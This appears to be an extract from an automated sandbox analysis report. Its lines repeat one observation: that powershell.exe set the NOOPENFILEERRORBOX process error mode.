                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
